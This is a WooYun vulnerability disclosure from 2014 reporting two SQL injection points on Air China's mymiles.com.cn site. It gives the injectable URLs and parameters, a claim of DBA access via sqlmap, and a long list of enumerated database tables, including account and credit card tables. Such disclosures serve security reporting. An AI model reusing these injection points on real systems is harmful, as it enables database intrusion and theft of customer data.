漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-048763
漏洞标题:中国国际航空某分站两处SQL注入漏洞(DBA权限)
相关厂商:中国国际航空股份有限公司
漏洞作者: sex is not show
提交时间:2014-01-13 15:38
修复时间:2014-01-18 15:39
公开时间:2014-01-18 15:39
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-01-13: 细节已通知厂商并且等待厂商处理中
2014-01-18: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
两处SQL注入
详细说明:
国航里程网
注入点:
http://www.mymiles.com.cn/d/District_list.php?key=4 key 字段存在注入
http://www.mymiles.com.cn/listlocationhx.php?Locationhx=%B1%B1%BE%A9%C4%CF%D4%B7%B9%FA%BC%CA%BB%FA%B3%A1&Ltype=S&City=%B1%B1%BE%A9 city字段存在注入
丢SQLMAP里跑:
当前用户:
DBA权限:
看库吧,不少...
表啥的..
[498 tables]
+--------------------------------+
| SECTION |
| ACCOUNT |
| ACCOUNT_EXTRAPERMISSIONS |
| ACCOUNT_PERMISSIONS |
| ACCOUNT_ROLES |
| ACC_CHECK_DETAIL |
| ACC_CHECK_LOG |
| ACC_FREEROOM |
| ACC_FREEROOM_APPLY |
| ACC_FREEROOM_DETAIL |
| ACC_FREEROOM_DISPART |
| ACC_GIFT |
| ACC_OVERPAYMENT |
| ACC_PAYIN |
| ACC_RCV |
| ACC_RCV_LOST |
| AGENT_CARD |
| AGENT_INFO |
| AGENT_MONEY_RECORD |
| AIRCODE |
| AIRPORT_MONEY_RECORD |
| AREA |
| AREA_ADMIN_DICT |
| ARTICLE_ARTICLE |
| ARTICLE_TYPE |
| AWARD |
| AWARD_DEALTYPE_DICT |
| AWARD_INFO |
| AWARD_STATUS_DICT |
| BACK_CARD |
| BBS |
| BBS_MAIN |
| BIZ_BASEINFO |
| BIZ_INFO |
| BIZ_LOCATION |
| BIZ_LOG |
| BIZ_ORDER_FLOW_DICT |
| BIZ_ORDER_INFO |
| BIZ_OTHERINFO |
| BIZ_PICTURE |
| BIZ_PICTURE_DICT |
| BIZ_SERVICEPRODUCT |
| BIZ_SERVICE_DICT |
| BIZ_SPECIALINFO_GOLF |
| BONUS_HISTORY |
| BONUS_HISTORY_DETAIL |
| BONUS_STATUS_DICT |
| BRANCH_DEPART_LOGIN |
| CABIN_FLIGHTLINE |
| CABIN_ORDER |
| CABIN_ORDER_DETAILS |
| CABIN_TABLE |
| CARBASEINFO |
| CARD_AGENT_INFO |
| CARD_AGENT_SELL_RECORD |
| CARD_AIRPORT_INFO |
| CARD_AIRPORT_PRICE |
| CARD_BANK_BACK_ACCOUNT |
| CARD_BANK_BACK_CAPITAL_DICT |
| CARD_BANK_BACK_CARD_TMP |
| CARD_BANK_BACK_DETAIL |
| CARD_BANK_BACK_REPORT |
| CARD_BANK_BACK_TYPE_DICT |
| CARD_BANK_CARD_TYPE |
| CARD_BANK_INFO |
| CARD_BANK_LEVEL_DICT |
| CARD_COMPANY_ORDER_RECORD |
| CARD_COMPANY_SELL_LOG |
| CARD_DEPT_GIFT_LOG |
| CARD_DEPT_GIFT_NUM |
| CARD_EMS_CITY |
| CARD_FINANCE_RECORD |
| CARD_FINANCE_RECORD_DETAIL |
| CARD_INVOICE_RECORD |
| CARD_MONEY_RECORD |
| CARD_ORDER_TEL_SLICE |
| CARD_OUT_SHEET |
| CARD_OUT_SHEET_DETAIL |
| CARD_SELL_EMS |
| CARD_SELL_EMS_MONEY |
| CARD_SELL_EMS_REPORT |
| CARD_SELL_RECORD |
| CARD_STATUS_LOG |
| CARD_TYPE_DICT |
| CAR_COMPANY |
| CHECK_RECORD |
| CITY |
| CITY4AIRTICKET |
| CITYPOR |
| CITY_AIRCODE |
| CITY_HX |
| CITY_INFO |
| COLUMNS_ADMIN |
| COMPANY_DEPARTMENT |
| COMPLAIN |
| COMPLAIN_CONTENT_DICT |
| COMPLAIN_DEAL_LOG |
| COMPLAIN_PARTY_DICT |
| COMPLAIN_RESULT_DICT |
| COMPLAIN_ROUTE_DICT |
| COMPLAIN_STATUS_DICT |
| CONSULTATION_TYPE_DICT |
| CONTACTUS_TYPE |
| CONTACT_ADMIN |
| COOPERATE_COMPANY |
| COUNTRY |
| CREDITCARD_INFO |
| CRS_HOTELS |
| CRS_LOGS |
| CRS_ORDERS |
| CURRENCY_DICT |
| DEPARTMENT |
| DREAMMILESREG |
| DREAM_REMARK |
| EMPLOYEE |
| EMS_BALANCE |
| EMS_REPORT |
| FAQ |
| FAQ_TYPE_DICT |
| FAXTRANSFER |
| FAX_QUEUE |
| FAX_RECVLIST |
| FINANCE_PARAM |
| FIRSTTEST |
| GGZJ |
| HOTELAVAIL_PRICE_LOG |
| HOTELERRORS |
| HOTELTICKET_DETAIL |
| HOTELTICKET_MODDETAIL |
| HOTEL_ACC_DETAIL |
| HOTEL_ACC_DETAIL_CONFIRM |
| HOTEL_ACC_DETAIL_TMP |
| HOTEL_ACC_INVOICE |
| HOTEL_ACC_PERIOD |
| HOTEL_ACC_PERIOD_CONFIRM |
| HOTEL_ACC_PERIOD_TMP |
| HOTEL_ACC_STEP_DETAIL |
| HOTEL_ACC_STEP_DETAIL_CONFIRM |
| HOTEL_ACC_STEP_DETAIL_TMP |
| HOTEL_ACC_VERBAL_LOG |
| HOTEL_AREA |
| HOTEL_AREA_DICT |
| HOTEL_AROUND |
| HOTEL_AROUND_DICT |
| HOTEL_BASEINFO |
| HOTEL_BASEINFO1 |
| HOTEL_BASEINFO_NEW |
| HOTEL_BASEINFO_TMP |
| HOTEL_BOOKPOLICY |
| HOTEL_CAPITAL_DICT |
| HOTEL_CONTRACT |
| HOTEL_COUNT_TMP |
| HOTEL_CREDIT_CARD |
| HOTEL_CREDIT_CARD_DICT |
| HOTEL_DINING |
| HOTEL_ENT |
| HOTEL_ENT_DICT |
| HOTEL_EVALUATE |
| HOTEL_FACILITY |
| HOTEL_FINANCE_MONTH |
| HOTEL_GUARANTEE |
| HOTEL_INFO |
| HOTEL_INFO1 |
| HOTEL_LOCATION |
| HOTEL_LOG |
| HOTEL_LOGIN |
| HOTEL_MEETING |
| HOTEL_NOROOM |
| HOTEL_PICTURE |
| HOTEL_PICTURE_DICT |
| HOTEL_PLANFEE |
| HOTEL_PNR |
| HOTEL_PRODUCT |
| HOTEL_PRODUCT_TEMP |
| HOTEL_PROGRAM |
| HOTEL_RECOMMAND |
| HOTEL_REMARK |
| HOTEL_ROOM |
| HOTEL_ROOM_DICT |
| HOTEL_ROOM_EQUIPMENT_DICT |
| HOTEL_ROOM_TEMP |
| HOTEL_SERVICE |
| HOTEL_SERVICE_DICT |
| HOTEL_STAR_DICT |
| HOTEL_STATUS |
| HOTEL_STATUS_TEMP |
| HOTEL_STEP |
| HOTEL_STEP_DETAIL |
| HOTEL_STEP_SALES |
| HOTEL_SUBSTITUTE |
| HOTEL_TICKET |
| HOTEL_TRAFFIC |
| HOTEL_TRAFFIC_DICT |
| HOTEL_TRANSFER |
| HOTEL_TYPE_DICT |
| HZK |
| IDCARDPRE6_CITYID |
| IMG_FILE |
| IMG_TYPE |
| INDEX_DC |
| INVOICE_MANAGE |
| INVOICE_RECORD |
| INVOICE_TOTAL |
| LOCATION |
| MAKE_SHEET |
| MEMBER_AFFIRMSTATUS_DICT |
| MEMBER_AWARDDEALFORFINANCE |
| MEMBER_BONUSDEALFORFINANCE |
| MEMBER_BONUSRECORD |
| MEMBER_BONUS_INFO |
| MEMBER_CARDDEALFORFINANCE |
| MEMBER_CONSULTATION |
| MEMBER_LEAVEWORDS_LOG |
| MEMBER_MAILCARE_SERVICE |
| MEMBER_POINTPRINCIPLE_DICT |
| MEMBER_POINTS_LOG_1207 |
| MEMBER_POINTS_LOG_1207_A |
| MEMBER_POINTS_LOG_1208 |
| MEMBER_POINTS_LOG_TEST |
| MEMBER_SCALE_DICT |
| MEMBER_SCALE_LOG |
| MEMBER_SESSION_LOG |
| MEMBER_SMSCARE_SERVICE |
| MEMBER_STATUS_LOG |
| MEMBER_TEMP_INFO |
| MEMBER_TEM_INFO |
| MEMBER_TRAVEL_INFO |
| MEMBER_WEB |
| MENU |
| MESSAGE_LOG |
| MESSAGE_ROUTE_DICT |
| MESSAGE_TYPE_DICT |
| MODE_TYPE_DICT |
| MONEY_RECORD |
| MONEY_RECORD_DETAIL |
| MONEY_TYPE_DICT |
| MYMILES_POINTSRESULT |
| MYMILES_POINTSRESULT_1207 |
| NATION_DICT |
| NEWS |
| NEWS_REMARK |
| NIGHT_TEMP |
| NOTE |
| ORDERTOUR |
| ORDER_AFFIRM_1 |
| ORDER_AFFIRM_2 |
| ORDER_AFFIRM_COUNT2B_FLOW |
| ORDER_AFFIRM_COUNT2_FLOW |
| ORDER_AGENT |
| ORDER_AGENT_ACC_DETAIL |
| ORDER_AGENT_ACC_DETAIL_UPDATE |
| ORDER_AGENT_ACC_RECORD |
| ORDER_AGENT_ACC_RECORD_UPDATE |
| ORDER_AGENT_MONTH_COMM |
| ORDER_AGENT_STEP |
| ORDER_BOOK |
| ORDER_BREAKFAST_BED |
| ORDER_BREAKFAST_BED_TEMP |
| ORDER_CAR |
| ORDER_CUIDAN_COUNT2_FLOW |
| ORDER_DELAYTIME_LOG |
| ORDER_DETAIL |
| ORDER_DETAIL_TEMP |
| ORDER_DETAIL_TEST |
| ORDER_EFF_1 |
| ORDER_EFF_2 |
| ORDER_EFF_2_MAX |
| ORDER_EFF_NONE |
| ORDER_FAILURE |
| ORDER_FAILURE_DICT |
| ORDER_FLOW_DICT |
| ORDER_GROUP |
| ORDER_GUARD |
| ORDER_INFO |
| ORDER_INFO_TEMP |
| ORDER_LOG |
| ORDER_LOG1 |
| ORDER_LOGIN_AGENT |
| ORDER_LOGIN_HOTEL |
| ORDER_LOGIN_LOG_CALL |
| ORDER_LOGIN_LOG_WEB |
| ORDER_LOST |
| ORDER_LOST_DICT |
| ORDER_MAIN |
| ORDER_NIGHTCHECK |
| ORDER_NIGHTCHECK_ASSIGN |
| ORDER_NIGHTCHECK_DOING |
| ORDER_NIGHTCHECK_FAX |
| ORDER_NIGHTCHECK_HOTEL |
| ORDER_NIGHTCHECK_LOG |
| ORDER_NIGHTCHECK_UPDATE |
| ORDER_NOSHOW_DETAIL |
| ORDER_NOSHOW_REASON_ITEM |
| ORDER_NOSHOW_REASON_TYPE |
| ORDER_NOTIFY_QUEUE |
| ORDER_PARAM |
| ORDER_PAY |
| ORDER_PEGASUS |
| ORDER_PRICE_DICT |
| ORDER_REPLY |
| ORDER_REPLY_TWO |
| ORDER_ROOM_STATUS |
| ORDER_ROUTE |
| ORDER_ROUTE_DETAIL |
| ORDER_STATUS |
| ORDER_TEL_LIST |
| ORDER_TICKET_HOTEL_BOOK |
| ORDER_TICKET_HOTEL_COUNT2 |
| ORDER_TICKET_HOTEL_OVER |
| ORDER_TICKET_HOTEL_REPLY |
| ORDER_TICKET_HOTEL_REPLY_TWO |
| ORDER_TRANSFER |
| ORDER_TRIP_DETAIL |
| ORDER_TYPE |
| ORDER_TYPE_DICT |
| ORDER_VEHICLE |
| ORDER_VEHICLE_DETAIL |
| OUT_SHEET |
| OUT_SHEET_DETAIL |
| OWNER_GUOHANG |
| PAGES |
| PAGE_BRANCHS |
| PERMISSION |
| PERMISSION_PAGES |
| PHPBB_ACL_GROUPS |
| PHPBB_ACL_OPTIONS |
| PHPBB_ACL_ROLES |
| PHPBB_ACL_ROLES_DATA |
| PHPBB_ACL_USERS |
| PHPBB_ATTACHMENTS |
| PHPBB_BANLIST |
| PHPBB_BBCODES |
| PHPBB_BOOKMARKS |
| PHPBB_BOTS |
| PHPBB_CONFIG |
| PHPBB_CONFIRM |
| PHPBB_DISALLOW |
| PHPBB_DRAFTS |
| PHPBB_EXTENSIONS |
| PHPBB_EXTENSION_GROUPS |
| PHPBB_FORUMS |
| PHPBB_FORUMS_ACCESS |
| PHPBB_FORUMS_TRACK |
| PHPBB_FORUMS_WATCH |
| PHPBB_GROUPS |
| PHPBB_ICONS |
| PHPBB_LANG |
| PHPBB_LOG |
| PHPBB_MODERATOR_CACHE |
| PHPBB_MODULES |
| PHPBB_POLL_OPTIONS |
| PHPBB_POLL_VOTES |
| PHPBB_POSTS |
| PHPBB_PRIVMSGS |
| PHPBB_PRIVMSGS_FOLDER |
| PHPBB_PRIVMSGS_RULES |
| PHPBB_PRIVMSGS_TO |
| PHPBB_PROFILE_FIELDS |
| PHPBB_PROFILE_FIELDS_DATA |
| PHPBB_PROFILE_FIELDS_LANG |
| PHPBB_PROFILE_LANG |
| PHPBB_RANKS |
| PHPBB_REPORTS |
| PHPBB_REPORTS_REASONS |
| PHPBB_SEARCH_RESULTS |
| PHPBB_SEARCH_WORDLIST |
| PHPBB_SEARCH_WORDMATCH |
| PHPBB_SESSIONS |
| PHPBB_SESSIONS_KEYS |
| PHPBB_SITELIST |
| PHPBB_SMILIES |
| PHPBB_STYLES |
| PHPBB_STYLES_IMAGESET |
| PHPBB_STYLES_IMAGESET_DATA |
| PHPBB_STYLES_TEMPLATE |
| PHPBB_STYLES_TEMPLATE_DATA |
| PHPBB_STYLES_THEME |
| PHPBB_TOPICS |
| PHPBB_TOPICS_POSTED |
| PHPBB_TOPICS_TRACK |
| PHPBB_TOPICS_WATCH |
| PHPBB_USERS |
| PHPBB_USER_GROUP |
| PHPBB_WARNINGS |
| PHPBB_WORDS |
| PHPBB_ZEBRA |
| PIC |
| PRESENT_NUMBER_RECORD |
| PRODUCT_ZYX |
| PROSPECT |
| PROSPECT_CONTEXT |
| PROSPECT_PRICE |
| PROSP_STYLE |
| PROVINCE4AIRTICKET |
| RESEARCH |
| ROLE_DICT |
| ROLE_PERMISSION |
| ROOM_TICKET |
| ROOM_TRANSFER |
| ROOM_USE_LOG |
| ROUTE |
| ROUTE_CONTEXT |
| ROUTE_DETAIL |
| ROUTE_ELEMENT_DICT |
| ROUTE_REMARK |
| ROUTE_TYPE |
| SALE_CARD |
| SENDFAXLOG |
| SETTLEACCOUNT |
| SETTLEACCOUNT_BEIZHU |
| SHOP |
| SHOP_CREDIT_CARD |
| SHOP_DATA |
| SHOP_DETAIL |
| SHOP_LEAVEMESSAGE_LOG |
| SHOP_MEMBER_TMP |
| SHOP_ORDER |
| SHOP_ORDER_CASH |
| SHOP_ORDER_CASH_DETAIL |
| SHOP_ORDER_CASH_MESSAGE |
| SHOP_ORDER_DETAIL |
| SHOP_REMARK |
| SHOP_STATUS |
| SHOP_TYPE |
| SMS_MSG |
| SMS_QUEUE |
| SYS_EXPORT_SCHEMA_01 |
| SYS_EXPORT_SCHEMA_02 |
| SYS_EXPORT_SCHEMA_03 |
| SYS_EXPORT_SCHEMA_04 |
| SYS_EXPORT_SCHEMA_05 |
| SYS_EXPORT_SCHEMA_06 |
| SYS_EXPORT_SCHEMA_07 |
| SYS_EXPORT_SCHEMA_08 |
| SYS_EXPORT_SCHEMA_09 |
| SYS_EXPORT_SCHEMA_10 |
| SYS_EXPORT_SCHEMA_11 |
| SYS_EXPORT_SCHEMA_12 |
| SYS_EXPORT_SCHEMA_13 |
| SYS_EXPORT_SCHEMA_14 |
| SYS_EXPORT_SCHEMA_15 |
| SYS_EXPORT_SCHEMA_16 |
| SYS_EXPORT_SCHEMA_17 |
| SYS_EXPORT_SCHEMA_18 |
| SYS_EXPORT_SCHEMA_19 |
| SYS_EXPORT_SCHEMA_20 |
| SYS_EXPORT_SCHEMA_21 |
| SYS_EXPORT_SCHEMA_22 |
| SYS_EXPORT_SCHEMA_23 |
| SYS_EXPORT_SCHEMA_24 |
| SYS_EXPORT_SCHEMA_25 |
| SYS_EXPORT_SCHEMA_26 |
| SYS_EXPORT_SCHEMA_27 |
| SYS_EXPORT_SCHEMA_28 |
| SYS_EXPORT_SCHEMA_29 |
| SYS_EXPORT_SCHEMA_30 |
| SYS_IMPORT_FULL_01 |
| TEL_RECORD |
| TEMPIP |
| TEMP_LUOTUO_TOPS |
| TEST |
| THEME_TYPE |
| TMP_PGETAGENTMONTHDATA |
| TMP_PGETCARDAGENTMONTHDATA |
| TMP_PGETFAXFINANCEDATA |
| TMP_PGETFAXNIGHTCHECKHOTELDATA |
| TMP_PGETHOTELCHECKORDER |
| TMP_PGETINITFINANCEDATA |
| TMP_PGETORDERAGENTCHECKDATA |
| TRANSFERFAX |
| TRANSFERFAXSTATUS |
| TRANSFER_CARD |
| TRANSFER_CITY |
| TRANSFER_ORDER_LOG |
| TRANSFER_PNR_LOG |
| TRANSFER_PRODUCT |
| TRAVELSKY_HBE_LOGS |
| TRAVEL_ASSISTANT |
| TRAVEL_TYPE_DICT |
| TRA_ELEMENT |
| TRA_ELEMENT_DICT |
| VIEWSPOT |
| VIP_ORDER |
| VOTEJOB_STATUS_DICT |
| VOTEOBJECT_DICT |
| VOTE_BASIC |
| VOTE_CONTENT |
| VOTE_DETAIL |
| VOTE_JOB |
| VOTE_MEMBER |
| VOTE_MEMBER1 |
| VOTE_MEMBER_INFO |
| VOTE_MEMBER_LOG |
| VOTE_STOPTYPE_DICT |
| VOTE_TEMPLATE_DICT |
| VOTE_TEMPLATE_ITEM_DICT |
| WORKSTATION |
| YBQH |
+--------------------------------+
DBA权限,可跨库,可XXX,就不继续了。希望多给点辛苦费
漏洞证明:
修复方案:
参数过滤、
版权声明:转载请注明来源 sex is not show@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-01-18 15:39
厂商回复:
最新状态:
暂无